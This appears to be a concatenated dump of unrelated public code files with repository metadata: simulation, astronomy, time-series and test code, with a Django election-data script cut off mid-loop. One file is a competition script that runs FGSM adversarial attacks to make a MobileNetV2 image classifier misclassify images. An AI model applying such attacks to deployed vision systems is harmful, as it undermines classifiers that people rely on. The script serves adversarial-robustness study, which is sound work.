@abstractmethod
def is_admin(self):
pass
class Customer(User):
def __init__(self, username, password, licence):
super().__init__(username, password)
self._licence = licence
def is_admin(self):
return False
def __str__(self):
return f'Customer <name: {self._username}, licence: {self._licence}>'
class Admin(User):
def is_admin(self):
return True
def __str__(self):
return f'Admin <name: {self._username}>'
| [
"ypducdtu@163.com"
] | ypducdtu@163.com |
8829126941188052375e680fa9fb5c24cf8b972b | 17ca5bae91148b5e155e18e6d758f77ab402046d | /Comparsion/compare_Federica_SED_data/compare_result.py | c3a371fd9726be0f5a55285fd4ac2f393152474a | [] | no_license | dartoon/QSO_decomposition | 5b645c298825091c072778addfaab5d3fb0b5916 | a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15 | refs/heads/master | 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 14:00:30 2019
@author: Dartoon
Comparing the fitting between Xuheng and Federica
"""
import numpy as np
import astropy.io.fits as pyfits
import matplotlib.pyplot as plt
import sys
sys.path.insert(0,'../../py_tools')
from load_result import load_host_p, load_err
ID = ['CID1174', 'CID1281', 'CID206', 'CID216', 'CID237', 'CID255', 'CID3242',
'CID3570', 'CID452', 'CID454', 'CID50', 'CID543', 'CID597', 'CID607',
'CID70', 'LID1273', 'LID1538', 'LID360', 'XID2138', 'XID2202', 'XID2396',
'CDFS-1', 'CDFS-229', 'CDFS-321', 'CDFS-724', 'ECDFS-358', 'SXDS-X1136',
'SXDS-X50', 'SXDS-X717', 'SXDS-X735', 'SXDS-X763', 'SXDS-X969']
Mstar = load_host_p(ID=ID, folder='../../')[1]
Mstar_err = load_err(prop = 'Mstar', ID=ID)
LR = load_host_p(ID=ID, folder='../../', dm = 0)[0] #!!! This dm is important
LR_err = load_err(prop = 'LR', ID=ID)
Fede = np.loadtxt('Summary.txt') #0ID 1M*_SED 2M*_IMAGEDEC 3LR_SED 4LR_IMAGEDEC 5agreement
bool = [Fede[:,3]!=-99] #exclude CID255 at this moment
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8., 12, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
#plt.plot(LR[bool], Fede[:,3][bool], 'bo', label='SED only')
plt.errorbar(LR[bool], Fede[:,3][bool], xerr=[np.abs(LR_err)[:,0][bool], np.abs(LR_err)[:,1][bool]],yerr=0.2 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(LR[bool], Fede[:,4][bool], 'r^', label='fix HST result')
plt.xlim([8.8,11.8])
plt.ylim([8.8,11.8])
plt.title("Comparsion of LR",fontsize=35)
plt.xlabel("Xuheng log$(L_R/L_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(L_R/L_{\odot})$",fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show()
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8.5, 12.5, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
plt.errorbar(Mstar[bool], Fede[:,1][bool], xerr=[np.abs(Mstar_err)[:,0][bool], np.abs(Mstar_err)[:,1][bool]],yerr=0.3 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(Mstar[bool], Fede[:,2][bool], 'r^', label='fix HST result')
plt.xlim([8.5,12.5])
plt.ylim([8.5,12.5])
plt.title("Comparsion of M*",fontsize=35)
plt.xlabel("Xuheng log$(M_*/M_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(M_*/M_{\odot})$", fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show() | [
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
dcc3c59f832a438160969f7eff0db6008ce5f49a | 632dcb4e37cadd87cb7ff8715b0048df5cd0d11b | /CompuCell3D/core/Demos/CC3DPy/scripts/AdhesionDemo.py | a0e3522ec008b21130e6d566bf455e82f0417b33 | [
"MIT"
] | permissive | CompuCell3D/CompuCell3D | df638e3bdc96f84b273978fb479842d071de4a83 | 65a65eaa693a6d2b3aab303f9b41e71819f4eed4 | refs/heads/master | 2023-08-26T05:22:52.183485 | 2023-08-19T17:13:19 | 2023-08-19T17:13:19 | 12,253,945 | 51 | 41 | null | 2023-08-27T16:36:14 | 2013-08-20T20:53:07 | C++ | UTF-8 | Python | false | false | 3,763 | py | """
This example demonstrates how to specify cell adhesion on the basis of molecular species.
"""
__author__ = "T.J. Sego, Ph.D."
__email__ = "tjsego@iu.edu"
from cc3d.core.PyCoreSpecs import Metadata, PottsCore
from cc3d.core.PyCoreSpecs import CellTypePlugin, VolumePlugin, ContactPlugin
from cc3d.core.PyCoreSpecs import UniformInitializer
from cc3d.core.PyCoreSpecs import AdhesionFlexPlugin
from cc3d.CompuCellSetup.CC3DCaller import CC3DSimService
def main():
###############
# Basic setup #
###############
# An interactive CC3D simulation can be initialized from a list of core specs.
# Start a list of core specs that define the simulation by specifying a two-dimensional simulation
# with a 100x100 lattice and second-order Potts neighborhood, and metadata to use multithreading
dim_x = dim_y = 100
specs = [
Metadata(num_processors=4),
PottsCore(dim_x=dim_x,
dim_y=dim_y,
neighbor_order=2,
boundary_x="Periodic",
boundary_y="Periodic")
]
##############
# Cell Types #
##############
# Define three cell types called "T1" through "T3".
cell_types = ["T1", "T2", "T3"]
specs.append(CellTypePlugin(*cell_types))
#####################
# Volume Constraint #
#####################
# Assign a volume constraint to all cell types.
volume_specs = VolumePlugin()
for ct in cell_types:
volume_specs.param_new(ct, target_volume=25, lambda_volume=2)
specs.append(volume_specs)
############
# Adhesion #
############
# Assign uniform adhesion to all cells, and additional adhesion by molecular species
contact_specs = ContactPlugin(neighbor_order=2)
for idx1 in range(len(cell_types)):
contact_specs.param_new(type_1="Medium", type_2=cell_types[idx1], energy=16)
for idx2 in range(idx1, len(cell_types)):
contact_specs.param_new(type_1=cell_types[idx1], type_2=cell_types[idx2], energy=16)
specs.append(contact_specs)
adhesion_specs = AdhesionFlexPlugin(neighbor_order=2)
adhesion_specs.density_new(molecule="M1", cell_type="T1", density=1.0)
adhesion_specs.density_new(molecule="M2", cell_type="T2", density=1.0)
formula = adhesion_specs.formula_new()
formula.param_set("M1", "M1", -10.0)
formula.param_set("M1", "M2", 0.0)
formula.param_set("M2", "M2", 10.0)
specs.append(adhesion_specs)
####################################
# Cell Distribution Initialization #
####################################
# Initialize cells over the entire domain.
unif_init_specs = UniformInitializer()
unif_init_specs.region_new(width=5, pt_min=(0, 0, 0), pt_max=(dim_x, dim_y, 1),
cell_types=["T1", "T1", "T2", "T2", "T3"])
specs.append(unif_init_specs)
#####################
# Simulation Launch #
#####################
# Initialize a CC3D simulation service instance and register all simulation specification.
cc3d_sim = CC3DSimService()
cc3d_sim.register_specs(specs)
cc3d_sim.run()
cc3d_sim.init()
cc3d_sim.start()
#################
# Visualization #
#################
# Show a single frame to visualize simulation data as it is generated.
cc3d_sim.visualize()
#############
# Execution #
#############
# Wait for the user to trigger execution
input('Press any key to continue...')
# Execute 10k steps
while cc3d_sim.current_step < 10000:
cc3d_sim.step()
# Report performance
print(cc3d_sim.profiler_report)
# Wait for the user to trigger termination
input('Press any key to close...')
if __name__ == '__main__':
main()
| [
"tjsego@gmail.com"
] | tjsego@gmail.com |
783ec51dceb9fa9c98c3845feb2efa5b9fc3a98a | fb3caa66ac0b2254b422303d670a70e597067758 | /201911_AI_Sec_Baidu/core-attack-codes/b_04.py | 03f7281f7068cfaf99a57ec7f5d848afd55c0a40 | [] | no_license | dyngq/Competitions | 065ec9f153919950b161aaa9fff6a9de9e29ba32 | e9b7ff8fbe038e148bc61b21b077f35cdc5368a9 | refs/heads/master | 2021-06-13T13:55:11.352531 | 2021-05-08T09:49:24 | 2021-05-08T09:49:24 | 186,392,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,927 | py | #coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import numpy as np
import paddle.fluid as fluid
#加载自定义文件
import models
from attack.attack_pp import FGSM, PGD
from utils import init_prog, save_adv_image, process_img, tensor2img, calc_mse, add_arguments, print_arguments
#######parse parameters
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
add_arg('class_dim', int, 121, "Class number.")
add_arg('shape', str, "3,224,224", "output image shape")
add_arg('input', str, "./input2_image/", "Input directory with images")
add_arg('output', str, "./input3_image/", "Output directory with images")
args = parser.parse_args()
print_arguments(args)
######Init args
image_shape = [int(m) for m in args.shape.split(",")]
class_dim=args.class_dim
input_dir = args.input
output_dir = args.output
model_name="MobileNetV2_x2_0"
pretrained_model="./models_parameters/MobileNetV2_x2_0"
val_list = 'val_list.txt'
use_gpu=True
######Attack graph
adv_program=fluid.Program()
#完成初始化
with fluid.program_guard(adv_program):
input_layer = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
#设置为可以计算梯度
input_layer.stop_gradient=False
# model definition
model = models.__dict__[model_name]()
out_logits = model.net(input=input_layer, class_dim=class_dim)
out = fluid.layers.softmax(out_logits)
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
#记载模型参数
fluid.io.load_persistables(exe, pretrained_model)
#设置adv_program的BN层状态
init_prog(adv_program)
#创建测试用评估模式
eval_program = adv_program.clone(for_test=True)
#定义梯度
with fluid.program_guard(adv_program):
label = fluid.layers.data(name="label", shape=[1] ,dtype='int64')
loss = fluid.layers.cross_entropy(input=out, label=label)
gradients = fluid.backward.gradients(targets=loss, inputs=[input_layer])[0]
######Inference
def inference(img):
fetch_list = [out.name]
result = exe.run(eval_program,
fetch_list=fetch_list,
feed={ 'image':img })
result = result[0][0]
pred_label = np.argmax(result)
pred_score = result[pred_label].copy()
return pred_label, pred_score
######FGSM attack
#untarget attack
def attack_nontarget_by_FGSM(img, src_label):
pred_label = src_label
step = 8.0/64.0
eps = 32.0/64.0
while pred_label == src_label:
#生成对抗样本
adv=FGSM(adv_program=adv_program,eval_program=eval_program,gradients=gradients,o=img,
input_layer=input_layer,output_layer=out,step_size=step,epsilon=eps,
isTarget=False,target_label=0,use_gpu=use_gpu)
pred_label, pred_score = inference(adv)
step *= 2
if step > eps:
break
print("Test-score: {0}, class {1}".format(pred_score, pred_label))
adv_img=tensor2img(adv)
return adv_img
def attack_nontarget_by_FGSM_test(img, src_label):
pred_label = src_label
print("---------------AAAA-------------------Test-score: {0}, class {1}".format(pred_label, pred_label))
pred_label, pred_score = inference(img)
print("---------------BBBB-------------------Test-score: {0}, class {1}".format(pred_score, pred_label))
####### Main #######
def get_original_file(filepath):
with open(filepath, 'r') as cfile:
full_lines = [line.strip() for line in cfile]
cfile.close()
original_files = []
for line in full_lines:
label, file_name = line.split()
original_files.append([file_name, int(label)])
return original_files
def gen_adv():
mse = 0
original_files = get_original_file(input_dir + val_list)
for filename, label in original_files:
img_path = input_dir + filename
print("Image: {0} ".format(img_path))
img=process_img(img_path)
# attack_nontarget_by_FGSM_test(img, label)
prelabel, xxxx = inference(img)
if label == prelabel:
adv_img = attack_nontarget_by_FGSM(img, label)
else:
adv_img = tensor2img(img)
image_name, image_ext = filename.split('.')
##Save adversarial image(.png)
save_adv_image(adv_img, output_dir+image_name+'.jpg')
# attack_nontarget_by_FGSM_test(img, label)
org_img = tensor2img(img)
score = calc_mse(org_img, adv_img)
print(score)
mse += score
print("ADV {} files, AVG MSE: {} ".format(len(original_files), mse/len(original_files)))
def main():
gen_adv()
if __name__ == '__main__':
main()
| [
"dyngqk@163.com"
] | dyngqk@163.com |
c4554c601893281110fded6f14187ef73c6df8da | 5086e9d2ae0c146f80f546e97788a2e4b1e5438f | /stumpy/aampdist_snippets.py | cbf29b4fd5eb31168e0994c1091e9d1e56555ee2 | [
"BSD-3-Clause"
] | permissive | HuoHuoisAlan/stumpy | a6c9952c2dd3343710521858295145b7eca8f727 | 01e867cfbef6f827b5b28913fd76a4eda59c5fed | refs/heads/main | 2023-04-18T17:42:47.952135 | 2021-05-09T23:47:01 | 2021-05-09T23:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,043 | py | # STUMPY
# Copyright 2019 TD Ameritrade. Released under the terms of the 3-Clause BSD license.
# STUMPY is a trademark of TD Ameritrade IP Company, Inc. All rights reserved.
import math
import numpy as np
from .core import check_window_size
from .aampdist import _aampdist_vect
def _get_all_aampdist_profiles(
T,
m,
percentage=1.0,
s=None,
mpdist_percentage=0.05,
mpdist_k=None,
mpdist_custom_func=None,
):
"""
For each non-overlapping subsequence, `S[i]`, in `T`, compute the matrix profile
distance measure vector between the `i`th non-overlapping subsequence and each
sliding window subsequence, `T[j : j + m]`, within `T` where `j < len(T) - m + 1`.
Parameters
----------
T : ndarray
The time series or sequence for which to find the snippets
m : int
The window size for each non-overlapping subsequence, `S[i]`.
percentage : float, default 1.0
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
`percentage == 1.0`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
is used to compute `mpdist_vect`.
s : int, default None
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
When `s == m`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
the `percentage` parameter is ignored.
mpdist_percentage : float, default 0.05
The percentage of distances that will be used to report `mpdist`. The value
is between 0.0 and 1.0.
mpdist_k : int
Specify the `k`th value in the concatenated matrix profiles to return. When
`mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
mpdist_custom_func : object, default None
A custom user defined function for selecting the desired value from the
sorted `P_ABBA` array. This function may need to leverage `functools.partial`
and should take `P_ABBA` as its only input parameter and return a single
`MPdist` value. The `percentage` and `k` parameters are ignored when
`mpdist_custom_func` is not None.
Returns
-------
D : ndarray
MPdist profiles
Notes
-----
`DOI: 10.1109/ICBK.2018.00058 \
<https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
See Table II
"""
if m > T.shape[0] // 2: # pragma: no cover
raise ValueError(
f"The window size {m} for each non-overlapping subsequence is too large "
f"for a time series with length {T.shape[0]}. "
f"Please try `m <= len(T) // 2`."
)
right_pad = 0
if T.shape[0] % m != 0:
right_pad = int(m * np.ceil(T.shape[0] / m) - T.shape[0])
pad_width = (0, right_pad)
T = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
n_padded = T.shape[0]
D = np.empty(((n_padded // m) - 1, n_padded - m + 1))
if s is not None:
s = min(int(s), m)
else:
percentage = min(percentage, 1.0)
percentage = max(percentage, 0.0)
s = min(math.ceil(percentage * m), m)
# Iterate over non-overlapping subsequences, see Definition 3
for i in range((n_padded // m) - 1):
start = i * m
stop = (i + 1) * m
S_i = T[start:stop]
D[i, :] = _aampdist_vect(
S_i,
T,
s,
percentage=mpdist_percentage,
k=mpdist_k,
custom_func=mpdist_custom_func,
)
stop_idx = n_padded - m + 1 - right_pad
D = D[:, :stop_idx]
return D
def aampdist_snippets(
T,
m,
k,
percentage=1.0,
s=None,
mpdist_percentage=0.05,
mpdist_k=None,
):
"""
Identify the top `k` snippets that best represent the time series, `T`
Parameters
----------
T : ndarray
The time series or sequence for which to find the snippets
m : int
The snippet window size
k : int
The desired number of snippets
percentage : float, default 1.0
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is the percentage of `S[i]` (i.e., `percentage * m`) to set the `s` to. When
`percentage == 1.0`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `percentage < 1.0`, then shorter subsequences from `S[i]`
is used to compute `mpdist_vect`.
s : int, default None
With the length of each non-overlapping subsequence, `S[i]`, set to `m`, this
is essentially the sub-subsequence length (i.e., a shorter part of `S[i]`).
When `s == m`, then the full length of `S[i]` is used to compute the
`mpdist_vect`. When `s < m`, then shorter subsequences with length `s` from
each `S[i]` is used to compute `mpdist_vect`. When `s` is not `None`, then
the `percentage` parameter is ignored.
mpdist_percentage : float, default 0.05
The percentage of distances that will be used to report `mpdist`. The value
is between 0.0 and 1.0.
mpdist_k : int
Specify the `k`th value in the concatenated matrix profiles to return. When
`mpdist_k` is not `None`, then the `mpdist_percentage` parameter is ignored.
Returns
-------
snippets : ndarray
The top `k` snippets
snippets_indices : ndarray
The index locations for each of top `k` snippets
snippets_profiles : ndarray
The MPdist profiles for each of the top `k` snippets
snippets_fractions : ndarray
The fraction of data that each of the top `k` snippets represents
snippets_areas : ndarray
The area under the curve corresponding to each profile for each of the top `k`
snippets
Notes
-----
`DOI: 10.1109/ICBK.2018.00058 \
<https://www.cs.ucr.edu/~eamonn/Time_Series_Snippets_10pages.pdf>`__
See Table I
"""
if m > T.shape[0] // 2: # pragma: no cover
raise ValueError(
f"The snippet window size of {m} is too large for a time series with "
f"length {T.shape[0]}. Please try `m <= len(T) // 2`."
)
check_window_size(m, max_size=T.shape[0] // 2)
D = _get_all_aampdist_profiles(
T,
m,
percentage=percentage,
s=s,
mpdist_percentage=mpdist_percentage,
mpdist_k=mpdist_k,
)
pad_width = (0, int(m * np.ceil(T.shape[0] / m) - T.shape[0]))
T_padded = np.pad(T, pad_width, mode="constant", constant_values=np.nan)
n_padded = T_padded.shape[0]
snippets = np.empty((k, m))
snippets_indices = np.empty(k, dtype=np.int64)
snippets_profiles = np.empty((k, D.shape[-1]))
snippets_fractions = np.empty(k)
snippets_areas = np.empty(k)
Q = np.full(D.shape[-1], np.inf)
indices = np.arange(0, n_padded - m, m)
for i in range(k):
profile_areas = np.sum(np.minimum(D, Q), axis=1)
idx = np.argmin(profile_areas)
snippets[i] = T[indices[idx] : indices[idx] + m]
snippets_indices[i] = indices[idx]
snippets_profiles[i] = D[idx]
snippets_areas[i] = np.sum(np.minimum(D[idx], Q))
Q[:] = np.minimum(D[idx], Q)
total_min = np.min(snippets_profiles, axis=0)
for i in range(k):
mask = snippets_profiles[i] <= total_min
snippets_fractions[i] = np.sum(mask) / total_min.shape[0]
total_min = total_min - mask.astype(np.float64)
return (
snippets,
snippets_indices,
snippets_profiles,
snippets_fractions,
snippets_areas,
)
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
43bb8e261178ccdbc8e0f38e34e559c1b2793e98 | 7bfb0fff9d833e53573c90f6ec58c215b4982d14 | /1688_count_matches.py | 0df81efb7ce040266c81c8a31339b3ec5db755e9 | [
"MIT"
] | permissive | claytonjwong/leetcode-py | 6619aa969649597a240e84bdb548718e754daa42 | 16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7 | refs/heads/master | 2023-07-14T23:40:26.569825 | 2021-08-22T17:23:20 | 2021-08-22T17:23:20 | 279,882,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #
# 1688. Count of Matches in Tournament
#
# Q: https://leetcode.com/problems/count-of-matches-in-tournament/
# A: https://leetcode.com/problems/count-of-matches-in-tournament/discuss/970250/Kt-Js-Py3-Cpp-1-Liners
#
class Solution:
def numberOfMatches(self, N: int) -> int:
return 0 if N == 1 else N // 2 + self.numberOfMatches(N // 2 + int(N & 1))
| [
"claytonjwong@gmail.com"
] | claytonjwong@gmail.com |
8149d78a21a4530ab537abc4fe3892b1c77bac7f | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/7-模块/a/Titan.py | 957bf78140bb6a110f980f0763207417854d9978 | [
"MIT"
] | permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 669 | py |
# 一个.py文件就是一个模块
'''
def sayGood():
print('good')
def sayNice():
print('nice')
def sayBad():
print('bad')
age = 20
name = 'titan'
print('这是Titan模块')
'''
# 每一个模块中都有一个__name__属性, 当其值等于__main__时, 表明该模块自身在执行, 否则被引入了其他文件
# 当前文件如果为程序的入口文件, 则__name__属性的值为__main__
if __name__ == '__main__':
print('这是Titan模块--a')
else:
def sayGood():
print('good--a')
def sayNice():
print('nice--a')
def sayBad():
print('bad--a')
age = 20
name = 'titan--a'
| [
"quanjunt@163.com"
] | quanjunt@163.com |
fa060e2a53f5effc20a8ce419c69bbe06bf117b4 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_22416.py | 84c894c7c3f546ab1aaffeb33d766e1d830f19d6 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | # Iron Python Error: expected <type 'bytes'> or bytearray, got <type 'str'> for Serial comm
ser.write(bytes(message.encode('utf-8')))
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
8bd9e1c2de7c0fb1b38880603978273791276919 | 854ec5a700af132a3423be5a27a8857d2d8357a6 | /project/tests/test__config.py | c7f681e4c786c681690d511179d626d9967463b3 | [
"MIT"
] | permissive | mohammad-chavoshipor/flask-challenge | 8f53ce80b84e88c101eec4e7e216a9e7625eec62 | 6902a43d6c5f435edc668bc51fc08cd785ffb965 | refs/heads/master | 2021-06-12T15:04:27.211542 | 2017-03-10T19:02:58 | 2017-03-10T19:02:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # project/server/tests/integration/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from project.server import app
class TestDevelopmentConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.DevelopmentConfig')
return app
def test_app_is_development(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
self.assertFalse(current_app is None)
self.assertFalse('data_test.json' in app.config['DATA_FILE'])
self.assertTrue('data_dev.json' in app.config['DATA_FILE'])
self.assertFalse('stats_test.json' in app.config['STATS_FILE'])
self.assertTrue('stats_dev.json' in app.config['STATS_FILE'])
class TestTestingConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.TestingConfig')
return app
def test_app_is_testing(self):
self.assertTrue(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is True)
self.assertTrue('data_test.json' in app.config['DATA_FILE'])
self.assertFalse('data_dev.json' in app.config['DATA_FILE'])
self.assertTrue('stats_test.json' in app.config['STATS_FILE'])
self.assertFalse('stats_dev.json' in app.config['STATS_FILE'])
class TestProductionConfig(TestCase):
def create_app(self):
app.config.from_object('project.server.config.ProductionConfig')
return app
def test_app_is_production(self):
self.assertFalse(current_app.config['TESTING'])
self.assertTrue(app.config['DEBUG'] is False)
if __name__ == '__main__':
unittest.main()
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
5d5edef53054c600d6795dfea1de892c610022d3 | aa8fac8fc911912b21658b00febb3e23383c617e | /util/network.py | 99cfe79ccc6c2b040a83ff9414ae9682245e6a2a | [] | no_license | atrox3d/1HDOC-flask-secrets | 26606c96e8ce82265dba3761a142bb1e25da1c8d | c28cdab14cb7932e59baec0f9e9976311a381907 | refs/heads/master | 2023-04-08T17:38:18.443428 | 2021-04-19T16:32:25 | 2021-04-19T16:32:25 | 355,586,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | import socket
def get_ipaddress():
return socket.gethostbyname(socket.gethostname())
| [
"atrox3d@gmail.com"
] | atrox3d@gmail.com |
83bcec5f7f7b822b4d5ee74bb80925b5e1c023e9 | 689eff74c3687f8386cbbdf4ff1d0c6b01568ba6 | /app/base/views.py | 281a6fd672ab301a139d9efebe1d4050f82f5bff | [] | no_license | huyquyet/projectBRS | fc50aac595112823c44952e137f11d6a3f6765a3 | 5a2f994a98f97db4b1717bc6187910ce9ad889e6 | refs/heads/master | 2021-01-10T10:09:44.265887 | 2015-12-16T03:53:39 | 2015-12-16T03:53:39 | 44,585,735 | 0 | 0 | null | 2015-12-15T07:16:39 | 2015-10-20T06:08:22 | HTML | UTF-8 | Python | false | false | 815 | py | from django.db.models import Avg
from django.views.generic.base import ContextMixin
from app.book.models import Book
from app.category.models import Category
__author__ = 'FRAMGIA\nguyen.huy.quyet'
class BaseView(ContextMixin):
model = Book
def get_context_data(self, **kwargs):
ctx = super(BaseView, self).get_context_data(**kwargs)
ctx['base_list_book'] = return_list_book()
ctx['base_list_category'] = return_list_category()
return ctx
def return_list_book():
book = Book.objects.annotate(Avg('rating_book__rate')).order_by('-rating_book__rate__avg')[0:6]
for i in book:
i.rate = i.get_rating_book()
i.count_review = i.review_book.all().count()
return book
def return_list_category():
cate = Category.objects.all()
return cate
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
a58b5f4e97d7f6162d8a7c522dc379644b1730e2 | 13130259156f6f9d16670cea88aa2608dd477d16 | /goeievraag/category/categorize_question.py | a12d559ec35a110035014a626c69944b5e85b342 | [] | no_license | fkunneman/DiscoSumo | d459251d543be5f4df38292a96f52baf4b520a0b | ed8f214834cf0c2e04a3bc429253502f7e79fbf8 | refs/heads/master | 2022-12-14T13:34:41.496963 | 2019-07-31T15:57:02 | 2019-07-31T15:57:02 | 140,422,779 | 2 | 1 | null | 2022-12-08T04:57:55 | 2018-07-10T11:36:00 | Python | UTF-8 | Python | false | false | 1,203 | py |
from qcat import QCat
import sys
model_file = sys.argv[1]
label_encoder_file = sys.argv[2]
category2id_file = sys.argv[3]
vocabulary_file = sys.argv[4]
qc = QCat(model_file,label_encoder_file,category2id_file,vocabulary_file)
test_questions = ["Kunnen we volgende week weer schaatsen op natuurijs",
"Wat is het lekkerste recept voor boerenkool",
"Hoeveel kleuren heeft de regenboog",
"Wat is de symbolische betekenis van de kip die de vrouw vasthoudt op het schilderij De Nachtwacht",
"waar kan ik in amsterdam het best een dwerg hamster aanschaffen",
"Waarom zie je nooit babyduifjes",
"Hoe krijg je een weggelopen konijn ( ontsnapt ) weer terug",
"Wat is het synoniem voor synoniem",
"wat s de reden dat vogels niet vastvriezen aan een ijsschots",
"Als een winkel 24 uur per dag en 365 dagen per jaar geopend is , waarom zit er dan een slot op de deur"]
print('Now categorizing questions')
results = qc.main(test_questions,5)
for i,result in enumerate(results):
print('TOP 5 categories for question',test_questions[i],':',result)
| [
"thiago.castro.ferreira@gmail.com"
] | thiago.castro.ferreira@gmail.com |
a1b9bf680534dbbfbc310a822deb14f1bb4e2dad | 51205b1a93bce66f1f47bd9eb5410e6f9b4c4da1 | /py/loop.py | e301447f632f4950299dabe067ddf745977ba7b9 | [
"MIT"
] | permissive | prataprc/gist | 70c2534079efb97cafd7bf58f1df4bb4284d13d1 | 4814ee6600d9f33dd940e4b3b9a98a0764a03bb5 | refs/heads/master | 2021-04-12T05:38:48.153925 | 2020-12-07T15:06:24 | 2020-12-07T15:06:24 | 32,151,350 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | #! /usr/bin/python
# Some examples using the looping constructs in python
a = ['cat', 'dog', 'elephant']
x = 10
print type(x)
for x in a :
print x, type(x), len(x)
b = 'hello \n world'
for x in b :
print x, type(x), len(x)
# Dangerous iteration on a mutable sequence (list)
# for x in a :
# a.insert(1, x) # Dont do this !
# print a
# To acheive the above mentioned purpose do the following
for x in a[:] : # Now we taking a copy of the sequence
a.insert(0, x) # you can safely do this !
print a
# Using the range() function
for x in range(10,100,30) :
print x,
else
print "the loop normally exited"
| [
"prataprc@gmail.com"
] | prataprc@gmail.com |
c4e566e7859ca5d0c9129e87c6823acbc30ec828 | dd9e7df6b7dd915e749f537f490f62d38b7fa214 | /maintenance/management/commands/init_foreign_uiks.py | 4dc74e932e8ed0915027885c5da01ffad9782c2f | [] | no_license | mikpanko/elections_network | 383039b5310d006811f3638924bed41184bc2a64 | 6c14c79d9ec74c30d9998533ef73819f0e2e91bd | refs/heads/master | 2020-12-31T03:16:49.742384 | 2012-06-30T14:19:22 | 2012-06-30T14:19:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | import os.path
from django.conf import settings
from django.core.management.base import BaseCommand
from scrapy.selector import HtmlXPathSelector
from grakon.utils import print_progress, read_url
FOREIGN_UIKS_URL = 'http://www.foreign-countries.vybory.izbirkom.ru/region/region/foreign-countries?action=show&root=1000085&tvd=100100032124923&vrn=100100031793505®ion=99&global=true&sub_region=99&prver=0&pronetvd=null&vibid=100100032124923&type=226'
class Command(BaseCommand):
help = "Init foreign uiks"
def handle(self, *args, **options):
from locations.models import FOREIGN_CODE, FOREIGN_NAME, Location
uiks = {}
for line in open(os.path.join(settings.PROJECT_PATH, 'data', 'foreign_uiks.csv'), 'r'):
uik_no, country_id, country_name, address = line.strip().split(',')
uiks[uik_no] = {'tik': int(country_id), 'address': address}
countries_by_id = dict((location.id, location) for location in Location.objects.exclude(region=None) \
.filter(tik=None).filter(region_code=FOREIGN_CODE))
foreign_countries = Location.objects.get(region=None, region_code=FOREIGN_CODE)
i = 0
for uik_option in HtmlXPathSelector(text=read_url(FOREIGN_UIKS_URL)) \
.select("//select[@name='gs']//option"):
